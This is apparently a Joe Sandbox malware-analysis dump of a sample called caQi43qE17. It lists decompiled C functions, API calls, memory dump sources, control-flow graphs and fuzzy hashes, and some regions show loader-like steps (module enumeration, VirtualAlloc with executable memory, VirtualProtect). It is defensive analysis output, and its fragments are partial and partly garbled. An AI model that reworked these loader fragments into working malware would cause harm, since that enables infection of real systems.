• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for E0040AF66 (rendered figure; node addresses and edges recovered from it, legend Executed / Not Executed):
• 169: 40af66-40af6e
• 170: 40af7d-40af88 (call 40b84d)
• 173: 40af70-40af7b (call 40d2e3)
• 174: 40af8a-40af8b
• 177: 40af8c-40af98
• 178: 40afb3-40afca (call 40af49, call 40cd39)
• 179: 40af9a-40afb2 (call 40aefc, call 40d2bd)
Edges: 169->170, 170->173, 170->174, 173->170, 173->177, 177->178, 177->179, 179->178
C-Code - Quality: 63%
E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
	signed int _v4;
	signed int _v16;
	signed int _v40;
	void* _t14;
	signed int _t15;
	intOrPtr* _t21;
	signed int _t24;
	void* _t28;
	void* _t39;
	void* _t40;
	signed int _t42;
	void* _t45;
	void* _t47;
	void* _t51;

	_t40 = __edi;
	_t28 = __ebx;
	_t45 = _t51;
	while(1) {
		_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
		if(_t14 != 0) {
			break;
		}
		_t15 = E0040D2E3(_a4);
		__eflags = _t15;
		if(_t15 == 0) {
			__eflags =  *0x423490 & 0x00000001;
			if(( *0x423490 & 0x00000001) == 0) {
				 *0x423490 =  *0x423490 | 0x00000001;
				__eflags =  *0x423490;
				E0040AEFC(0x423484);
				E0040D2BD( *0x423490, 0x41a704);
			}
			E0040AF49( &_v16, 0x423484);
			E0040CD39( &_v16, 0x420fa4);
			asm("int3");
			_t47 = _t45;
			_push(_t47);
			_push(0xc);
			_push(0x420ff8);
			_t19 = E0040E1D8(_t28, _t40, 0x423484);
			_t42 = _v4;
			__eflags = _t42;
			if(_t42 != 0) {
				__eflags =  *0x4250b0 - 3;
				if( *0x4250b0 != 3) {
					_push(_t42);
					goto L16;
				} else {
					E0040D6E0(_t28, 4);
					_v16 = _v16 & 0x00000000;
					_t24 = E0040D713(_t42);
					_v40 = _t24;
					__eflags = _t24;
					if(_t24 != 0) {
						_push(_t42);
						_push(_t24);
						E0040D743();
					}
					_v16 = 0xfffffffe;
					_t19 = E0040B70B();
					__eflags = _v40;
					if(_v40 == 0) {
                                                                                                                                                                                                    									_push(_v4);
                                                                                                                                                                                                    									L16:
                                                                                                                                                                                                    									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                    										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                    										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						return E0040E21D(_t19);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    				goto L19;
                                                                                                                                                                                                    			}

APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
• Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
• Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
• Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from the extracted text. Recoverable information: basic blocks span 2460481-2460874; the block at 246068e-246069f calls LdrInitializeThunk.]
Strings
Memory Dump Source
• Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
Similarity
• API ID:
• String ID: :p^
• API String ID: 0-1306112509
• Opcode ID: 7c969c2e301072ba4335d8e994f81e1a8e01062a74b202df90622988759d5fa5
• Instruction ID: eae5e1d95af3d13f51c65b80896fe4b1a86ae5c8a9e645b454070be8357c4f77
• Opcode Fuzzy Hash: 7c969c2e301072ba4335d8e994f81e1a8e01062a74b202df90622988759d5fa5
• Instruction Fuzzy Hash: CCA117387506108FC754DF29D598A2AB7F2FF88B14B2190A9E50ACB3B5DB71EC41CB81
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 345 8d76de-8d76f7 346 8d76f9-8d76fb 345->346 347 8d76fd 346->347 348 8d7702-8d770e CreateToolhelp32Snapshot 346->348 347->348 349 8d771e-8d772b Module32First 348->349 350 8d7710-8d7716 348->350 351 8d772d-8d772e call 8d739d 349->351 352 8d7734-8d773c 349->352 350->349 355 8d7718-8d771c 350->355 356 8d7733 351->356 355->346 355->349 356->352
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D7706
                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008D7726
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                    • Instruction ID: 4461be3c971d3a097efe9e6ed44078bafd9cffa3acc609dad24ad024f1b9f910
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF09C311047156BD7203BF9988DF6E77E8FF45725F100A29E652D11C0EB70EC454751
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 358 40e7ee-40e7f6 call 40e7c3 360 40e7fb-40e7ff ExitProcess 358->360
C-Code - Quality: 100%
			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}
APIs
• ___crtCorExitProcess.LIBCMT ref: 0040E7F6
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
• ExitProcess.KERNEL32 ref: 0040E7FF
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
• Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1365 246fdb0-246fe64 VirtualProtect 1368 246fe66-246fe6c 1365->1368 1369 246fe6d-246feb5 1365->1369 1368->1369
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 0246FE54
Memory Dump Source
• Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: e81863748750aaed42551b80e21813bdd25f19f01888799bedf4e1edf870af1b
• Instruction ID: 702d908ee057eb4f25b81a5aff176e154dcddc10b5b6d1ad07e29f0b93761d6b
• Opcode Fuzzy Hash: e81863748750aaed42551b80e21813bdd25f19f01888799bedf4e1edf870af1b
• Instruction Fuzzy Hash: 1D3199B8D002489FCF14CFAAD984AEEFBB1BF49314F14942AE819B7210D775A945CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1477 50d0130-50d01c6 FindCloseChangeNotification 1481 50d01cf-50d0211 1477->1481 1482 50d01c8-50d01ce 1477->1482 1482->1481
APIs
• FindCloseChangeNotification.KERNEL32(?), ref: 050D01B6
Memory Dump Source
• Source File: 0000000A.00000002.368757015.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_50d0000_caQi43qE17.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: b69ac7093743a329450e6025409ed23401e76fe6558d0c9c0708e7e440fb16df
• Instruction ID: 8d4b1cb3a7142a0ca6251b8d1fe0037fb4f88dbc36f064e9f5f5154a9177bfa9
• Opcode Fuzzy Hash: b69ac7093743a329450e6025409ed23401e76fe6558d0c9c0708e7e440fb16df
• Instruction Fuzzy Hash: 8A31CBB8D012589FDB14CFAAD884A9EFBF5BF49314F14902AE819B7340D735A941CFA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1487 50d0138-50d01c6 FindCloseChangeNotification 1490 50d01cf-50d0211 1487->1490 1491 50d01c8-50d01ce 1487->1491 1491->1490
APIs
• FindCloseChangeNotification.KERNEL32(?), ref: 050D01B6
Memory Dump Source
• Source File: 0000000A.00000002.368757015.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_50d0000_caQi43qE17.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: f2a9267c663e3faebb49900c3b82f5acd7297d1720b433e9686b254e20c2607c
• Instruction ID: f67b6b512027bf5ab067dfd3b65eabbbc510bd47bd6191fd30a867b8a6d998cd
• Opcode Fuzzy Hash: f2a9267c663e3faebb49900c3b82f5acd7297d1720b433e9686b254e20c2607c
• Instruction Fuzzy Hash: 1031CBB8D002189FCB14CFAAD884A9EFBB5BF48314F14902AE819B7340D735A941CFA4
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 100%
			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 25%
			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				// pushes (code, 0, 0) and calls E0040E8DE, which the API list below identifies as the CRT _doexit
				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

APIs
• _doexit.LIBCMT ref: 0040EA16
  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
• Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
• Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008D73EE
Memory Dump Source
• Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 3aa2d06d39a1cbbefb8d1f948a53e5fbefc7a811d2ee29f9e084e9f23132612c
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 6D112B79A40208EFDB01DF98C985E98BFF5EF08350F058095F9489B362E371EA90DB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4b49b802a5628d41e409eceab40c8be93e2a75300d43ce24083db6bcf64f1f02
• Instruction ID: 9c6cca0d6f92e6c3e5f8a19d96b9704a133486b077eab93f14a870d2505d2840
• Opcode Fuzzy Hash: 4b49b802a5628d41e409eceab40c8be93e2a75300d43ce24083db6bcf64f1f02
• Instruction Fuzzy Hash: AA21F4B6500244DFDB25CF54D9C0B26BBA6FB88314F24C669ED894B246C37ADC12DBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ecf9803eb92092a6e766669aa078b095f0430dc4d9a18c0d2ee0a053e0f19da5
• Instruction ID: 0705f4cb12d08f035162e3e8b3d57a70d54a659ac0a14c4bab941c91158837c1
• Opcode Fuzzy Hash: ecf9803eb92092a6e766669aa078b095f0430dc4d9a18c0d2ee0a053e0f19da5
• Instruction Fuzzy Hash: DF21F475500240DFDB25DF58D9C4B26FF66FB88314F24C569E8450B246C73ADC26CBA2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f8a4a48412f1191aa6a0cefc4e35c7843162ad39462db105bfabc7129468195
• Instruction ID: c71b854b8e8a1c63cc855e92627f25ea83cbd64b2eb436245c429cec2a7f441a
• Opcode Fuzzy Hash: 5f8a4a48412f1191aa6a0cefc4e35c7843162ad39462db105bfabc7129468195
• Instruction Fuzzy Hash: 8121F875504244DFDB26CF14D9C0F2ABF66FB98314F24C569E8454B246C33ADC56CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8393c078c223d5c4b9625d332db69b614394e7d280f8e3a9495c0a3175a6893e
• Instruction ID: cb2cb982bb7fd575ff788f6e19436e4d7f9d0044641c728f9549d141b78aaa37
• Opcode Fuzzy Hash: 8393c078c223d5c4b9625d332db69b614394e7d280f8e3a9495c0a3175a6893e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121C076504280DFCB16CF10D9C4B1ABF62FB88314F2486A9D8880B256C33AD816CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 90244881b989ff30246403fd08531d5cdcc46a0ae5e18fa2708c759c060843b3
                                                                                                                                                                                                    • Instruction ID: b1131e2bf8adfa68691d28276990c560750f3ad0de082103c9ad713ebe095ea0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90244881b989ff30246403fd08531d5cdcc46a0ae5e18fa2708c759c060843b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1219D76504280DFDB16CF14D9C4B16FF62FB84314F24C6A9D8490B656C33AD866CBA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: af20fa5eb6ff981c173d00ecb4108a5abb877ef457d26a956410c01491c5e7cf
                                                                                                                                                                                                    • Instruction ID: 2971111c4429d1e354c074f7a79052f0b40bbb47c51accbdc10e3997220276ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af20fa5eb6ff981c173d00ecb4108a5abb877ef457d26a956410c01491c5e7cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A11D376504280CFDB12CF14D9C4B56BF72FB84324F24C6ADD8490B656C33AD85ACBA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b20678e0097d3c9abfdfce411ddd3bc17417f5e3c6af047dd3d90a6a4b2757d9
                                                                                                                                                                                                    • Instruction ID: 4b018a9d5c2601470e6773e2431f863cdb2d3d1e436acec719790a6e186b03ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b20678e0097d3c9abfdfce411ddd3bc17417f5e3c6af047dd3d90a6a4b2757d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC012B715043449EE7308B2ACC84B67BFD8EF51364F18C51AEC841B296C37D9C45C6B1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 9cf9d1a678238b953e33769315341b204c1c6cf3ead62ca5e68c52ffd3ecc63b
                                                                                                                                                                                                    • Instruction ID: 1bcb7b39332a33062f02443db02c3a3e2d87f306418000fe25a98842b5eedf26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf9d1a678238b953e33769315341b204c1c6cf3ead62ca5e68c52ffd3ecc63b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF06271504344AEE7208A16CC84B62FFD8EB51764F18C55AED885F296C3799C45CAB1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 85%
E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
	intOrPtr _v0;
	void* _v804;
	intOrPtr _v808;
	intOrPtr _v812;
	intOrPtr _t6;
	intOrPtr _t11;
	intOrPtr _t12;
	intOrPtr _t13;
	long _t17;
	intOrPtr _t21;
	intOrPtr _t22;
	intOrPtr _t25;
	intOrPtr _t26;
	intOrPtr _t27;
	intOrPtr* _t31;
	void* _t34;

	_t27 = __esi;
	_t26 = __edi;
	_t25 = __edx;
	_t22 = __ecx;
	_t21 = __ebx;
	_t6 = __eax;
	_t34 = _t22 -  *0x422234; // 0xf2638ec2
	if(_t34 == 0) {
		asm("repe ret");
	}
	 *0x423b98 = _t6;
	 *0x423b94 = _t22;
	 *0x423b90 = _t25;
	 *0x423b8c = _t21;
	 *0x423b88 = _t27;
	 *0x423b84 = _t26;
	 *0x423bb0 = ss;
	 *0x423ba4 = cs;
	 *0x423b80 = ds;
	 *0x423b7c = es;
	 *0x423b78 = fs;
	 *0x423b74 = gs;
	asm("pushfd");
	_pop( *0x423ba8);
	 *0x423b9c =  *_t31;
	 *0x423ba0 = _v0;
	 *0x423bac =  &_a4;
	 *0x423ae8 = 0x10001;
	_t11 =  *0x423ba0; // 0x0
	 *0x423a9c = _t11;
	 *0x423a90 = 0xc0000409;
	 *0x423a94 = 1;
	_t12 =  *0x422234; // 0xf2638ec2
	_v812 = _t12;
	_t13 =  *0x422238; // 0xd9c713d
	_v808 = _t13;
	 *0x423ae0 = IsDebuggerPresent();
	_push(1);
	E004138FC(_t14);
	SetUnhandledExceptionFilter(0);
	_t17 = UnhandledExceptionFilter(0x41fb80);
	if( *0x423ae0 == 0) {
		_push(1);
		E004138FC(_t17);
	}
	return TerminateProcess(GetCurrentProcess(), 0xc0000409);
}
Instruction offsets for the listing above: 0x0040ce09 to 0x0040ce11, then 0x00413644 to 0x0041373e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2579439406-0
